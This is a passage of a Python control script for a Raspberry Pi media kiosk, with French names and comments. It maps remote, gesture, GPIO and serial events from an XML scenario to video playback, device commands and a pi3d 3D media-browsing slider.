'y' : (0, 28), 'z' : (0, 26), '1' : (2, 30), '2' : (2, 31), '3' : (2, 32), '4' : (2, 33),
'5' : (2, 34), '6' : (2, 35), '7' : (2, 36), '8' : (2, 37), '9' : (2, 38), '0' : (2, 39),
'enter': (0, 40), '\b': (0, 42), 'escape': (0, 43), ' ' : (0, 44), '-' : (0, 35), '=' : (0, 46),
'[' : (64, 34), ']' : (64, 45), '\\': (64, 37), ';' : (0, 54), '\'': (64, 33), '`' : (64, 36),
',' : (0, 16), ':' : (0, 55), '/' : (2, 55), 'A' : (2, 20), 'B' : (2, 5), 'C' : (2, 6),
'D' : (2, 7), 'E' : (2, 8), 'F' : (2, 9), 'G' : (2, 10), 'H' : (2, 11), 'I' : (2, 12),
'J' : (2, 13), 'K' : (2, 14), 'L' : (2, 15), 'M' : (2, 51), 'N' : (2, 17), 'O' : (2, 18),
'P' : (2, 19), 'Q' : (2, 4), 'R' : (2, 21), 'S' : (2, 22), 'T' : (2, 23), 'U' : (2, 24),
'V' : (2, 25), 'W' : (2, 29), 'X' : (2, 27), 'Y' : (2, 28), 'Z' : (2, 26), '!' : (0, 56),
'@' : (64, 39), '#' : (64, 32), '$' : (0, 48), '%' : (32, 52), '^' : (64, 38), '&' : (0, 30),
'*' : (0, 49), '(' : (0, 34), ')' : (0, 45), '_' : (0, 37), '+' : (2, 46), '{' : (64, 33),
'}' : (64, 46), '|' : (64, 35), '.' : (2, 54), '"' : (0, 32), '~' : (64, 31), '<' : (0, 100),
'>' : (2, 100), '?' : (2, 16), 'Haut' : (0, 96), 'Bas' : (0, 90), 'Gauche' : (0, 92), 'Droite' : (0, 94)}
# Set up input events (IR remote control)
selector = selectors.DefaultSelector()
devices = [evdev.InputDevice(path) for path in evdev.list_devices()]
for device in devices:
if device.name=="HID 1d57:ad02 Consumer Control": IRconsumer = evdev.InputDevice(device.path)
if device.name=="HID 1d57:ad02 Keyboard": IRkeyboard = evdev.InputDevice(device.path)
try:
IRconsumer.grab() # exclusive access to the device (important to avoid interference with the rest of the system)
IRkeyboard.grab() # exclusive access to the device
selector.register(IRconsumer, selectors.EVENT_READ)
selector.register(IRkeyboard, selectors.EVENT_READ)
except:
pass
# Slider globals that do not change once initialised
RepertoireMediaIni='/home/pi/Documents/Slider/medias.ini'
AllMedias = [] # list of all media objects
categories=[] # list of category names
sous_categories=[] # list of lists of sub-category names
# Slider globals that depend on the context, i.e. on the currently selected category and sub-category
Medias=[] # media of the current category (and, if set, sub-category)
NextMedias=[] # media that will replace the current ones
cats=[] # pi3d text objects for the categories
souscats=[] # pi3d text objects for the sub-categories
cats2=[] # for the top-left display: pi3d text objects for the categories
souscats2=[] # for the top-left display: pi3d text objects for the sub-categories
slider_mode='selection' # mode with 3 possible values: selection / categorie / souscategorie
slider_visible=False
slider_stop=False
PAD_z=1.0
PAD_Actif=False
PAD_Timeout=-1
PAD_Timeout_Delay=200 # 2 seconds before the PAD is considered inactive
PAD_Transition_duree=10
PAD_Transition=-PAD_Transition_duree # activation runs from -PAD_Transition_duree to 0, deactivation from +PAD_Transition_duree to 0
PAD_seuil_detection=0.99
Slider_previously_selected_media=0
current_media=0
next_current_media=0
current_cat=0
current_souscat=-1
slider_action=''
move_steps=0 # current step of the transition - technique used to scroll the objects
nb_max_steps=10 # number of frames over which the transition runs
move_steps_media=0 # current step of the media transition
move_steps_cat=0 # current step of the category transition
move_steps_souscat=0
# ********** Functions
Player=None
PlayedMediaId=None
MediaAssociations={}
MediaTimeline={}
IRremotePrevious=0
Sub=[]
def playerExit(exit_code):
global PlayedMediaId, PlaylistNext, MediaAssociations, MediaTimeline
mediaid=PlayedMediaId
PlayedMediaId=None
MediaAssociations={}
MediaTimeline={}
if PlaylistNext:
if Scenario["Medias"][mediaid]["mediasuivant"]=="random":
PlayMedia(random.choice(list(Scenario["Medias"])))
elif Scenario["Medias"][mediaid]["mediasuivant"]:
PlayMedia(Scenario["Medias"][mediaid]["mediasuivant"])
def PlayMedia(mediaid):
global Player, PlayedMediaId, MediaAssociations, MediaTimeline, Sub, PlaylistNext
PlayedMediaId=mediaid
PlaylistNext=True
if mediaid in Scenario["Medias"]:
MediaAssociations=Scenario["Medias"][mediaid]["associations"]
MediaTimeline=Scenario["Medias"][mediaid]["timeline"].copy()
# print(mediaid)
# print(MediaTimeline)
Mediafile = Medias_path + '/' + Scenario["Medias"][mediaid]["filename"]
if (os.path.isfile(Mediafile)):
Player=OMXPlayer(Mediafile,args=Scenario["Medias"][mediaid]["arguments"].split(' '))
# print(Scenario["Medias"][mediaid]["arguments"])
if Scenario["Medias"][mediaid]["positionecran"] is not None:
pos=Scenario["Medias"][mediaid]["positionecran"].split(',')
Player.set_video_pos(int(pos[0]),int(pos[1]),int(pos[2]),int(pos[3]))
else:
TerminateProcesses(Sub,None)
Player.exitEvent += lambda _, exit_code: playerExit(exit_code)
def TerminateProcesses(ProcessList,nom):
for p in ProcessList:
if nom==None or nom==p["nom"]:
if p["process"].poll()==None:
p["process"].stdin.write(ast.literal_eval("b'"+p["terminate"]+"'"))
p["process"].stdin.flush()
def Lance(actionid):
if Debug: print("*** actionid *** ",actionid)
global Player, PlayedMediaId, Sub, slider_visible, slider_mode, slider_stop, slider_timeout, Slider_previously_selected_media
global Medias, current_media, PlaylistNext, VideoInputProcess
global RS232, RS232_ok, RS232_2, RS232_2_ok
if actionid in Scenario["Actions"]:
Programme=Scenario["Actions"][actionid]["programme"]
Commande=Scenario["Actions"][actionid]["commande"]
if Programme=="Slider":
slider_timeout=SLIDER_TIMEOUT
if Commande=="SliderStart":
slider_visible=True
elif Commande=="SliderStop":
if Debug: print('slider_stop=True')
slider_stop=True
elif Commande=="SliderOnOff":
slider_visible = not slider_visible
elif Commande=="SliderActionSelection":
slider_visible = False
if Slider_previously_selected_media != current_media:
Lance(Medias[current_media].action)
Slider_previously_selected_media=current_media
elif Commande=="SliderLeft":
if slider_mode=="selection":
SliderGaucheSelection()
elif slider_mode=="categorie":
SliderAfficherSelection()
elif slider_mode=="souscategorie":
SliderAfficherCategories()
elif Commande=="SliderRight":
if slider_mode=="selection":
SliderDroiteSelection()
elif slider_mode=='categorie' and (len(sous_categories[current_cat]) > 1): # la catégorie contient plusieurs sous catégories
SliderAfficherSousCategories()
elif slider_mode=='categorie' and (len(sous_categories[current_cat]) <= 1): # la catégorie contient 0 ou 1 seule sous catégorie
SliderAfficherSelection()
elif slider_mode=='souscategorie':
SliderAfficherSelection()
elif Commande=="SliderUp":
if slider_mode=="selection":
SliderAfficherCategories()
elif slider_mode=="categorie":
SliderHautCategories()
elif slider_mode=="souscategorie":
SliderHautSousCategories()
elif Commande=="SliderDown":
if slider_mode=="categorie":
SliderBasCategories()
elif slider_mode=="souscategorie":
SliderBasSousCategories()
elif Commande=="SliderAfficherMedias":
slider_visible=True
SliderAfficherSelection()
elif Commande=="SliderAfficherCategories":
SliderAfficherCategories()
elif Commande=="SliderAfficherSousCategories":
SliderAfficherSousCategories()
elif Commande=="SliderDump": # Utilisé pour le débogage
SliderDump()
elif Programme=="PlayMedia":
PlayMedia(Commande)
elif Programme=="MediaControl":
if PlayedMediaId:
try:
if Commande=="Pause": Player.pause()
if Commande=="Desactive":
Player.hide_video()
Player.pause()
if Commande=="Active":
Player.play()
Player.show_video()
if Commande=="Resume": Player.play()
if Commande=="Stop": Player.quit()
if Commande=="StopAll":
PlaylistNext=False
Player.quit()
except:
pass
elif Programme=="LED21":
if Commande=="on": GPIO.output(led21, 1)
if Commande=="off": GPIO.output(led21, 0)
elif Programme=="LED22":
if Commande=="on": GPIO.output(led22, 1)
if Commande=="off": GPIO.output(led22, 0)
elif Programme[0:10]=="Subprocess":
Sub.append({'process':subprocess.Popen(Commande.split(' '), shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE),
'nom':Programme.split('|')[1],
'terminate':Programme.split('|')[2]})
elif Programme=="StopSubprocess":
TerminateProcesses(Sub,Commande)
elif Programme[0:13]=="IPvideoPlayer":
try:
IPvideoplayerSocket=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
IPvideoplayerSocket.connect((Programme.split('|')[1], int(Programme.split('|')[2]))) # Programme="IPvideoPlayer|TCP_IP|TCP_PORT"
#IPvideoplayerSocket.send(bytes(Commande.encode()))
IPvideoplayerSocket.send(eval('b"'+Commande+'"'))
IPvideoplayerSocket.close()
print("IP video Player IP:" + Programme.split('|')[1] + " port:" + Programme.split('|')[2] + " commande: " + Commande)
except:
print("IP video Player IP not connected!")
pass
elif Programme=="Clavier":
wantedChar=Commande
modif, key = azerty_hid_codes[wantedChar]
raw = struct.pack("BBBBL", modif, 0x00, key, 0x00, 0x00000000)
with open("/dev/hidg0", "wb") as f:
f.write(raw) # press key
f.write(struct.pack("Q", 0)) # release key
elif Programme=="CommandeDMX":
pins=list(str(bin(int(Commande)))[2:].zfill(7))
pins.reverse()
GPIO.output([dmx0,dmx1,dmx2,dmx3,dmx4,dmx5,dmx6],(int(pins[0]),int(pins[1]),int(pins[2]),int(pins[3]),int(pins[4]),int(pins[5]),int(pins[6])))
elif Programme=="Video_input":
if Commande=="Start":
# VideoInputProcess = subprocess.Popen(VideoInputCommand.split(' '),stdin=subprocess.PIPE,stdout=None,stderr=None,bufsize=0)
Sub.append({'process':subprocess.Popen(VideoInputCommand.split(' '), shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE),
'nom':'VideoInputProcess',
'terminate':"\033"})
os.system("sleep 5 && xdotool search --name " + PI3D_window_name + " windowraise")
elif Commande=="Stop":
# TerminateProcesses(Sub,'VideoInputProcess')
# VideoInputProcess.terminate()
os.system("xdotool search --name " + VideoInput_window_name + " key q")
elif Programme=="RS232":
if RS232_ok:
for commande_unitaire in Commande.split("|"):
RS232.write(bytes(commande_unitaire.encode()))
time.sleep(0.1)
else:
print('RS232 non disponible - commande ' + Commande + ' non transmise')
elif Programme=="RS232_2":
if RS232_2_ok:
for commande_unitaire in Commande.split("|"):
RS232_2.write(bytes(commande_unitaire.encode()))
time.sleep(0.1)
else:
print('RS232_2 non disponible - commande ' + Commande + ' non transmise')
elif Programme=="Shutdown":
slider_stop=True
GPIO.cleanup()
if RS232_ok:
RS232.close()
if RS232_2_ok:
RS232_2.close()
if Commande=="reboot":
os.system("reboot")
else:
os.system("shutdown now")
else:
if Debug: print(Scenario["Actions"][actionid])
else:
raise LookupError(actionid + " n'est pas une action connue")
def TraiteEvenement(eventid):
global MediaAssociations
if eventid in Scenario["Associations"]:
for actionid in Scenario["Associations"][eventid]:
Lance(actionid)
if eventid in MediaAssociations:
for actionid in MediaAssociations[eventid]:
Lance(actionid)
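# Added note: an event id can be bound both globally (Scenario["Associations"]) and
# by the media currently playing (MediaAssociations); TraiteEvenement runs every
# action registered in either mapping, global associations first.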
def telecommande_read(): # Telecommande Infrarouge
global IRremotePrevious
while not slider_stop:
for key, mask in selector.select():
device = key.fileobj
for event in device.read():
if Debug: print('event.type = ',event.type)
if event.type == 4:
if event.value == IRremotePrevious:
IRremotePrevious=0
else:
eventid=str(event.value)
print("Telecommande: "+eventid)
if eventid in Scenario["Evenements"]["Remote"]:
TraiteEvenement(Scenario["Evenements"]["Remote"][eventid])
else:
if Debug: print(eventid)
IRremotePrevious=event.value
SLIDER_TIMEOUT = 10000
# ********** Load the scenario XML file into a dictionary
tree=ET.parse('Wootopia.xml')
root=tree.getroot()
Scenario={"Evenements":{},"Actions":{},"Associations":{},"Medias":{}}
for action in root.find("actions"):
Scenario["Actions"][action.attrib['actionid']]={
"programme":action.find('programme').text,
"commande":action.find('commande').text
}
for evenement in root.find("evenements"):
source=evenement.find('source').text
if (source=='Slider') and (evenement.attrib['evenementid']=='Slider_Timeout'): SLIDER_TIMEOUT=int(evenement.find('valeur').text)
if not source in Scenario["Evenements"]: Scenario["Evenements"][source]={}
Scenario["Evenements"][source][evenement.find('valeur').text]=evenement.attrib['evenementid']
for association in root.find("associations"):
if not association.find('evenement').text in Scenario["Associations"]:
Scenario["Associations"][association.find('evenement').text]=[]
Scenario["Associations"][association.find('evenement').text].append(association.find('action').text)
for media in root.find("medias"):
mediaid=media.attrib['mediaid']
Scenario["Medias"][mediaid]={
"filename":media.find('filename').text,
"positionecran":media.find('positionecran').text,
"arguments":media.find('arguments').text,
"mediasuivant":media.find('mediasuivant').text,
"associations":{},
"timeline":{}
}
for association in media.find("associations"):
if not association.find('evenement').text in Scenario["Medias"][mediaid]["associations"]:
Scenario["Medias"][mediaid]["associations"][association.find('evenement').text]=[]
Scenario["Medias"][mediaid]["associations"][association.find('evenement').text].append(association.find('action').text)
for event in media.find("timeline"):
if not event.find('seconds10').text in Scenario["Medias"][mediaid]["timeline"]:
Scenario["Medias"][mediaid]["timeline"][event.find('seconds10').text]=[]
Scenario["Medias"][mediaid]["timeline"][event.find('seconds10').text].append(event.find('action').text)
# ********** RS232 receive
def RS232receiveThread():
if RS232_receive_ok and "RS232_receive" in Scenario["Evenements"]:
while RS232_receive:
RS232_line=RS232_receive.readline()
if RS232_line:
for RS232_receive_expected in Scenario["Evenements"]["RS232_receive"]:
if eval(RS232_receive_expected) == RS232_line:
print("Reception RS232 correspondant à l'événement " + RS232_receive_expected)
TraiteEvenement(Scenario["Evenements"]["RS232_receive"][RS232_receive_expected])
else:
print("Reception RS232 " + RS232_receive_expected + " (aucun événement ne correspond)")
#threading.Thread(target=RS232receiveThread).start()
class RS232_listener(Thread):
def run(self):
RS232receiveThread()
RS232_listener().start()
# ********** RS232_2 receive
def RS232_2receiveThread():
if RS232_2_receive_ok and "RS232_2_receive" in Scenario["Evenements"]:
while RS232_2_receive:
RS232_2_line=RS232_2_receive.readline()
if RS232_2_line:
for RS232_2_receive_expected in Scenario["Evenements"]["RS232_2_receive"]:
if eval(RS232_2_receive_expected) == RS232_2_line:
print("Reception RS232_2 correspondant à l'événement " + RS232_2_receive_expected)
TraiteEvenement(Scenario["Evenements"]["RS232_2_receive"][RS232_2_receive_expected])
else:
print("Reception RS232_2 " + RS232_2_receive_expected + " (aucun événement ne correspond)")
#threading.Thread(target=RS232receiveThread).start()
class RS232_2_listener(Thread):
def run(self):
RS232_2receiveThread()
RS232_2_listener().start()
# ********** GPIO
def GPIO_DOWN(channel):
if (channel==4):
TraiteEvenement(Scenario["Evenements"]["GPIO_DOWN"]["4"])
if "GPIO_DOWN" in Scenario["Evenements"]:
if "4" in Scenario["Evenements"]["GPIO_DOWN"]:
GPIO.add_event_detect(4, GPIO.FALLING, callback=GPIO_DOWN) # FALLING or RISING
# ********** Slider timeout
slider_timeout = SLIDER_TIMEOUT
def SliderTimeout():
global slider_timeout, Medias, current_media
slider_timeout=SLIDER_TIMEOUT
#TraiteEvenement('Slider_Timeout')
# slider_visible=False
# Lance(Medias[current_media].action)
# IR remote control
class Telecommande(Thread):
def run(self):
telecommande_read()
Telecommande().start()
# Skywriter
try:
@skywriter.flick()
def flick(start,finish):
if start+"-"+finish in Scenario["Evenements"]["PAD"]:
TraiteEvenement(Scenario["Evenements"]["PAD"][start+"-"+finish])
# if Debug: print('Got a flick!', start, finish)
"""
@skywriter.airwheel()
def airwheel(delta):
if delta>0:
TraiteEvenement(Scenario["Evenements"]["PAD"]["airwheel-horaire"])
time.sleep(1)
delta=0
if delta<0:
TraiteEvenement(Scenario["Evenements"]["PAD"]["airwheel-antihoraire"])
time.sleep(1)
delta=0
print('Airwheel',delta)
"""
@skywriter.move()
def move(xp, yp, zp):
global PAD_z
PAD_z=zp
pass
except:
pass
# ********** Slider display parameters - compositing manager for window transparency
subprocess.Popen('xcompmgr', shell=False)
BACKGROUND = (0, 0, 0, 0)
#DISPLAY = pi3d.Display.create(background=BACKGROUND, frames_per_second=10, display_config=pi3d.DISPLAY_CONFIG_FULLSCREEN)
DISPLAY = pi3d.Display.create(background=BACKGROUND, frames_per_second=40, w=400, h=400, use_glx=True, window_title=PI3D_window_name)
# DISPLAY = pi3d.Display.create(background=BACKGROUND, frames_per_second=40, w=100, h=100, use_glx=True)
# DISPLAY = pi3d.Display.create(background=BACKGROUND, frames_per_second=40, display_config=pi3d.DISPLAY_CONFIG_FULLSCREEN, use_glx=True, layer=2, window_title=PI3D_window_name)
SHADER = pi3d.Shader("uv_flat")
Blur=True
Blur=False
Fog=True
if Blur:
defocus = pi3d.Defocus()
mykeys = pi3d.Keyboard()
action = ''
#taille=10
distance_mediax = 20 # horizontal distance between images
distance_mediay = 10 # vertical distance between the current images and the upcoming images
distance_mediaz = 20 # distance along z between the selected image and the other images
recul=40 # camera pull-back distance
#recul=80
distance=20 # general coefficient for displaying the categories
distance_caty=0.7
distance_catz=0.08
nb_step_cat=10 # number of steps to move from one category to another
nb_step_souscat=10 # number of steps to move from one sub-category to another
nb_step_media=10 # number of steps to move from one media to another - horizontal movement
nb_step_groupe_media=10 # number of steps to move from one media group to another - vertical movement
PlaylistNext=True # determines whether the playlist moves on to the next media or stops
CAMERA=pi3d.Camera.instance()
CAMERA.position((0,0,-recul))
"""
hand = pi3d.Model(file_string='hand.obj', name='hand') # image of the hand
hand.set_shader(SHADER)
sprite = pi3d.ImageSprite("PAD.png", SHADER, w=10.0, h=6.0) # image of the pad
"""
# ********** Initialise the geometric shapes: arrow (fleche) and frame (cadre)
# Initialise the arrow
lfleche = 0.10 # arrow width
hfleche = 0.125 # arrow height
fleche = pi3d.Lines(vertices=[[0, hfleche/4, 0],[2*lfleche/3, hfleche/4 , 0],[2*lfleche/3, hfleche/2, 0],[lfleche,0,0],[2*lfleche/3, -hfleche/2, 0],[2*lfleche/3, -hfleche/4, 0],[0, -hfleche/4, 0],[0, hfleche/4, 0]],x=0, y=0, z=0, material=(1.0,0.8,0.05),line_width=4)
fleche.position(0.27,0,-39)
fleche.shader = pi3d.Shader("mat_flat")
# Initialise the frame for the current category
lcadre = 0.5
hcadre = 0.125
cadre = pi3d.Lines(vertices=[[-lcadre/2, -hcadre/2, 0],[-lcadre/2, hcadre/2 , 0],[lcadre/2, hcadre/2, 0],[lcadre/2,-hcadre/2,0],[-lcadre/2, -hcadre/2, 0]],x=0, y=0, z=0, material=(1.0,0.8,0.05),line_width=4)
cadre.position(0,0,-39)
cadre.shader = pi3d.Shader("mat_flat")
# ********** Functions for managing media, categories and sub-categories
class CMedia:
def __init__(self, chemin_image, chemin_vignette, desc, action, cats_souscats):
# for example, cats_souscats = "Chaussures Hommes|Hiver;Chaussures Hommes|Sport"
cats = []
souscats = []
elts = cats_souscats.split(";")
for elt in elts:
cats.append(elt.split("|")[0])
souscats.append(elt.split("|")[1])
self.cats = cats
self.souscats = souscats
self.desc = desc
self.action = action
self.media = pi3d.ImageSprite(chemin_image, shader=SHADER, w=13, h=9.3, x=0, y=0, z=0)
self.mediadesc = pi3d.String(font=pi3d.Font("/home/pi/Documents/pi3d_demos/fonts/NotoSerif-Regular.ttf", (255, 255, 255, 255)), string=desc, x=0, y=0, z=0)
self.mediadesc.set_shader(SHADER)
#self.vignette = pi3d.ImageSprite(chemin_vignette, shader=SHADER, w=13, h=9.3, x=0, y=0, z=0)
def filtrerParCategorie(nom_cat):
if Debug: print("filtrerParCategorie : ",nom_cat)
res = []
for cm in AllMedias:
if nom_cat in cm.cats:
res.append(cm)
return res
def filtrerParSousCategorie(nom_cat, nom_souscat):
if Debug: print("filtrerParSousCategorie : ",nom_cat," : ",nom_souscat)
res = []
for cm in AllMedias:
i = 0
trouve = False
while (i < len(cm.cats)) and (trouve == False):
if (nom_cat == cm.cats[i]) and (nom_souscat == cm.souscats[i]):
trouve = True
res.append(cm)
else:
i =i+1
return res
# Load every media entry from the medias.ini file
f = open(RepertoireMediaIni, "r")
for l in f:
# if the line is not empty and its first character is neither [ nor #, process the line
if (len(l) > 0) and (l[0]!='[') and (l[0]!='#'):
if (l[-1]=='\n'):
l = l[0:len(l)-1]
t = l.split(';')
catssouscats = ""
i = 4
while i < len(t):
if i == 4:
catssouscats = t[i]
else:
catssouscats = catssouscats + ";" + t[i]
cat = t[i].split("|")[0]
souscat = t[i].split("|")[1]
if not(cat in categories):
categories.append(cat)
sous_categories.append([])
x = categories.index(cat)
if not(souscat in sous_categories[x]):
sous_categories[x].append(souscat)
i = i+1
AllMedias.append(CMedia(t[0],t[1],t[2], t[3], catssouscats))
if Debug: print(categories)
if Debug: print(sous_categories)
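# Added reference (inferred from the parser above; the values are invented
# examples): lines that are empty or start with '[' or '#' are skipped, and each
# remaining line of medias.ini is ';'-separated as
#   image_path;thumbnail_path;description;action_id;Categorie|SousCategorie[;Categorie|SousCategorie...]
# e.g. medias/basket.jpg;medias/basket_mini.jpg;Basket rouge;A12;Chaussures Hommes|Sport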
# ********** Transition functions for moving the media up or down
def transitionMediaBas(etape, maxetape):
i=0
for Media in Medias:
x=(i-current_media)*distance_mediax
y=-(etape/maxetape)*distance_mediay
if i == current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
i=0
for Media in NextMedias:
x=(i-next_current_media)*distance_mediax
y=distance_mediay*(1-etape/maxetape)
if i == next_current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
def transitionMediaHaut(etape, maxetape):
i=0
for Media in Medias:
x=(i-current_media)*distance_mediax
y=distance_mediay*(etape/maxetape)
if i == current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
i=0
for Media in NextMedias:
x=(i-next_current_media)*distance_mediax
y=distance_mediay*(etape/maxetape - 1)
if i == next_current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
# ********** Slider actions
def SliderDump():
if Debug: print("Début Slider dump")
if Debug: print('slider_visible = ',slider_visible)
if Debug: print('slider_mode = ',slider_mode)
if Debug: print('current_media = ',current_media)
if Debug: print('next_current_media = ',next_current_media)
if Debug: print('current_cat = ',current_cat)
if Debug: print('current_souscat = ',current_souscat)
if Debug: print('len(Medias) = ',len(Medias))
if Debug: print('Scenario["Associations"]["Slider_Timeout"] = ',Scenario["Associations"]["Slider_Timeout"])
if Debug: print("Fin Slider dump")
def SliderInitialiserAffichage():
global current_cat, current_souscat, cats, cats2, souscats2, Medias
current_cat=0 # index of the first category to display
current_souscat=-1 # index of the sub-category to display, -1 to show all sub-categories
# Initialise the categories and sub-categories
cats=[]
cats2=[]
souscats2=[]
i=0
for categorie in categories:
x=0
y=(i-current_cat)*distance_caty
z=-distance*(1.8-(abs(i-current_cat)*distance_catz))
a=pi3d.String(font=pi3d.Font("/home/pi/Documents/pi3d_demos/fonts/NotoSerif-Regular.ttf", (255, 255, 255, 255)), string=categorie, x=x, y=y, z=z)
a.set_shader(SHADER)
cats.append(a)
cats2.append(a)
res=[]
for souscategorie in sous_categories[i]:
a=pi3d.String(font=pi3d.Font("/home/pi/Documents/pi3d_demos/fonts/NotoSerif-Regular.ttf", (255, 255, 255, 255)), string=souscategorie, x=0, y=0, z=0)
a.set_shader(SHADER)
res.append(a)
souscats2.append(res)
i=i+1
# Initialise Medias
if current_souscat == -1:
Medias = filtrerParCategorie(categories[current_cat])
else:
Medias = filtrerParSousCategorie(categories[current_cat], sous_categories[current_cat][current_souscat])
def SliderAfficherSelection():
global current_media, slider_mode
slider_mode='selection'
# Position the media
nb_images = len(Medias)
if nb_images > 1:
current_media=1 # take the second media in the list
else:
current_media=0 # take the only media in the list
i=0
for Media in Medias:
x=(i-1)*distance_mediax
y=0
if i == current_media:
z=-distance_mediaz
else:
z=0
Media.media.position(x,y,z)
i=i+1
def SliderDroiteSelection():
global move_steps_media, slider_action
if current_media < len(Medias)-1:
# Important: the slider_action= assignment must come last because it is what triggers the visual transition
move_steps_media=1
slider_action = 'DroiteSelection'
def SliderGaucheSelection():
global move_steps_media, slider_action
if current_media > 0:
# Important: the slider_action= assignment must come last because it is what triggers the visual transition
move_steps_media=1
slider_action = 'GaucheSelection'
def SliderAfficherCategories():
global slider_mode, slider_action, NextMedias, move_steps, next_current_media
if slider_mode!='categorie':
if slider_mode=='souscategorie':
slider_mode='categorie'
cat = cats[current_cat]
cat.position(0,0,-distance*1.8)
NextMedias=filtrerParCategorie(categories[current_cat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important: the slider_action= assignment must come last because it is what triggers the visual transition
move_steps=0
slider_action="AfficherCategoriesAvecChangementMedia"
else:
slider_mode='categorie'
cat = cats[current_cat]
cat.position(0,0,-distance*1.8)
def SliderHautCategories():
global slider_mode, slider_action, move_steps_cat, current_cat, next_cat, next_current_media, categories, NextMedias
if (slider_mode=='categorie') and (current_cat < len(categories)-1):
next_cat = current_cat+1
NextMedias=filtrerParCategorie(categories[next_cat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important: the slider_action= assignment must come last because it is what triggers the visual transition
move_steps_cat=0
slider_action = "HautCategories"
def SliderBasCategories():
global slider_mode, slider_action, move_steps_cat, current_cat, next_cat, next_current_media, categories, NextMedias
if (slider_mode=='categorie') and (current_cat > 0):
next_cat = current_cat-1
NextMedias=filtrerParCategorie(categories[next_cat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important: the slider_action= assignment must come last because it is what triggers the visual transition
move_steps_cat=0
slider_action = 'BasCategories'
def SliderAfficherSousCategories():
global slider_action, slider_mode, move_steps, current_cat, current_souscat, souscats, next_current_media, NextMedias
if len(sous_categories[current_cat]) > 1:
slider_mode='souscategorie'
current_souscat = 1
# Initialise the sub-categories
souscats=[]
i=0
for souscategorie in sous_categories[current_cat]:
x=0
y=(i-current_souscat)*distance_caty
z=-distance*(1.8-(abs(i-current_souscat)*distance_catz))
#z=-distance*1.8
if Debug: print('pi3d.String : ',souscategorie)
a=pi3d.String(font=pi3d.Font("/home/pi/Documents/pi3d_demos/fonts/NotoSerif-Regular.ttf", (255, 255, 255, 255)), string=souscategorie, x=x, y=y, z=z)
a.set_shader(SHADER)
souscats.append(a)
i=i+1
NextMedias = filtrerParSousCategorie(categories[current_cat], sous_categories[current_cat][current_souscat])
if Debug: print('dans SliderAfficherSousCategories(), len(NextMedias) = ',len(NextMedias))
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important: the slider_action= assignment must come last because it is what triggers the visual transition
move_steps=0
slider_action='AfficherSousCategories'
def SliderHautSousCategories():
global slider_action, move_steps_souscat, next_souscat, NextMedias, next_current_media
if (slider_mode=='souscategorie') and (current_souscat < len(sous_categories[current_cat])-1):
next_souscat = current_souscat+1
NextMedias=filtrerParSousCategorie(categories[current_cat], sous_categories[current_cat][next_souscat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important: the slider_action= assignment must come last because it is what triggers the visual transition
move_steps_souscat=0
slider_action='HautSousCategories'
def SliderBasSousCategories():
global slider_action, move_steps_souscat, next_souscat, NextMedias, next_current_media
if (slider_mode=='souscategorie') and (current_souscat > 0):
next_souscat = current_souscat-1
NextMedias=filtrerParSousCategorie(categories[current_cat], sous_categories[current_cat][next_souscat])
if (len(NextMedias)>1):
next_current_media=1
else:
next_current_media=0
# Important: the slider_action= assignment must come last because it is what triggers the visual transition
move_steps_souscat=0
slider_action='BasSousCategories'
# Initialise the slider
SliderInitialiserAffichage()
SliderAfficherSelection()
print("******************")
print("****** Prêt ******")
print("******************")
# DISPLAY.destroy()
# while False:
# 3D display management loop, runs until the display is destroyed
while DISPLAY.loop_running():
# ********** Run the Start command if it exists
if "Start" in Scenario["Associations"]:
for actionid in Scenario["Associations"]["Start"]:
Lance(actionid)
Scenario["Associations"].pop("Start", None)
if PAD_z < PAD_seuil_detection:
PAD_Timeout=-1
if (PAD_z < PAD_seuil_detection) and (not PAD_Actif):
PAD_Actif=True
PAD_Transition=-PAD_Transition_duree
TraiteEvenement("PAD_Actif")
if (PAD_z >= PAD_seuil_detection) and (PAD_Actif):
if PAD_Timeout==-1:
PAD_Timeout=round(time.time()*100)
if Debug: print(PAD_Timeout)
else:
if Debug: print(round(time.time()*100) - PAD_Timeout - PAD_Timeout_Delay)
if (round(time.time()*100) - PAD_Timeout - PAD_Timeout_Delay) > 0:
PAD_Timeout=-1
PAD_Actif=False
PAD_Transition=PAD_Transition_duree
TraiteEvenement("PAD_Inactif")
# Lance("SliderActionSelection")
if Debug: print("PAD Inactif")
if slider_visible or PAD_Transition>0:
# PAD_Transition=-PAD_Transition_duree # activation de -PAD_Transition_duree à 0, désactivation de +PAD_Transition_duree à 0
if PAD_Transition<0: PAD_Transition=PAD_Transition+1
if PAD_Transition>0: PAD_Transition=PAD_Transition-1
CAMERA.reset()
if slider_visible:
CAMERA.position((0,0,-recul + (PAD_Transition / PAD_Transition_duree)*60))
if not slider_visible:
CAMERA.position((0,0,-recul - ((PAD_Transition_duree - PAD_Transition) / PAD_Transition_duree)*60))
############################ Slider ##############################
# Handle the pending movements
if slider_action=='DroiteSelection':
if move_steps_media <= nb_step_media:
i=0
while (i < len(Medias)):
if (i > current_media -3) and (i < current_media + 3):
Media = Medias[i]
x=(i-current_media-move_steps_media/nb_step_media)*distance_mediax
y, z = 0, 0
if i == (current_media+1):
z=-(move_steps_media/nb_step_media)*distance_mediaz
elif i == current_media:
z=-(1-move_steps_media/nb_step_media)*distance_mediaz
Media.media.position(x,y,z)
i=i+1
if move_steps_media == nb_step_media:
slider_action = ''
current_media = current_media + 1
else:
move_steps_media=move_steps_media+1
if slider_action == 'GaucheSelection':
if move_steps_media <= nb_step_media:
i=0
while (i < len(Medias)):
if (i > current_media -3) and (i < current_media + 3):
Media = Medias[i]
x=(i-current_media+move_steps_media/nb_step_media)*distance_mediax
y, z = 0, 0
if i == (current_media-1):
z=-(move_steps_media/nb_step_media)*distance_mediaz
elif i == current_media:
z=-(1-move_steps_media/nb_step_media)*distance_mediaz
Media.media.position(x,y,z)
i=i+1
if move_steps_media == nb_step_media:
